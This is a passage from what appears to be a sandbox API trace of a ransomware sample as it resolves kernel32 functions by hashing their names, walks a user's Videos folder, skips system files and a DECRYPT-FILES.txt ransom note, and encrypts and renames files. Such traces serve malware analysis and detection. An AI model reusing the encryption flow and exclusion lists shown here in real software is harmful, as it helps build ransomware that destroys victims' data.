(in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.178] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.178] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.178] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.178] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.178] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.178] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.178] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.178] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.179] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.179] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.179] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.179] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.179] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.179] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.179] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.179] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.179] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.179] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.179] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.179] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.179] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.179] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.179] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.179] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.179] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.179] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.179] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.180] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.180] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.180] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.180] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.180] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.180] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.180] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.180] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.180] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.180] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.180] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.180] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.180] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.180] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv") returned 57 [0087.180] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv.RKvWwHf") returned 65 [0087.180] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hpzuuidnupxujrbs.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv.RKvWwHf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hpzuuidnupxujrbs.flv.rkvwwhf"), dwFlags=0x0) returned 1 [0087.181] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.181] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.181] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.181] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6408a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.181] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.181] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.181] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.182] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.182] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.182] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.182] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.182] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.182] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.182] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.182] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.182] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.182] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jkbimi8.tmp" [0087.182] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.182] CloseHandle (hObject=0x0) returned 0 [0087.182] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.183] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf102740, ftCreationTime.dwHighDateTime=0x1d4d176, ftLastAccessTime.dwLowDateTime=0x13b14be0, ftLastAccessTime.dwHighDateTime=0x1d4cd93, ftLastWriteTime.dwLowDateTime=0x13b14be0, ftLastWriteTime.dwHighDateTime=0x1d4cd93, nFileSizeHigh=0x0, nFileSizeLow=0x509b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K-Qq.avi", cAlternateFileName="")) returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="autorun.inf") returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="boot.ini") returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="desktop.ini") returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="ntuser.dat") returned -1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="iconcache.db") returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="bootsect.bak") returned 1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="ntuser.dat.log") returned -1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="thumbs.db") returned -1 [0087.183] lstrcmpiW (lpString1="K-Qq.avi", lpString2="Bootfont.bin") returned 1 [0087.183] lstrlenW (lpString="K-Qq.avi") returned 8 [0087.183] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.183] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.183] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.183] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.183] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.183] lstrlenW (lpString="K-Qq.avi") returned 8 [0087.183] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.183] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="K-Qq.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi" [0087.183] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k-qq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.184] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=20635) returned 1 [0087.184] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.184] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.184] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.184] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.184] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.184] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.184] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.185] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.186] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.186] CloseHandle (hObject=0x414) returned 1 [0087.186] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.186] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.187] CloseHandle (hObject=0x0) returned 0 [0087.187] CloseHandle (hObject=0x410) returned 1 [0087.187] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.188] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.188] GetTickCount () returned 0x114e3ea [0087.188] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.188] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.188] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.188] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.189] lstrlenA (lpString="kernel32.dll") returned 12 [0087.189] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.189] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.189] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.189] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.189] lstrlenA (lpString="ADDATOMA") returned 8 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.189] lstrlenA (lpString="ADDATOMW") returned 8 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.189] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.189] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.189] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.189] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.189] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.189] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.189] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.189] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.190] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.190] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.190] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.190] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.190] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.190] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.190] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.190] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.190] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.190] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.190] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.190] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.190] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.190] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.190] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.190] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.190] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.190] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.190] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.191] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.191] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.191] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.191] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.191] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.191] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.191] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.191] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.191] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.191] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.191] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.191] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.191] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.191] lstrcpyA (in: 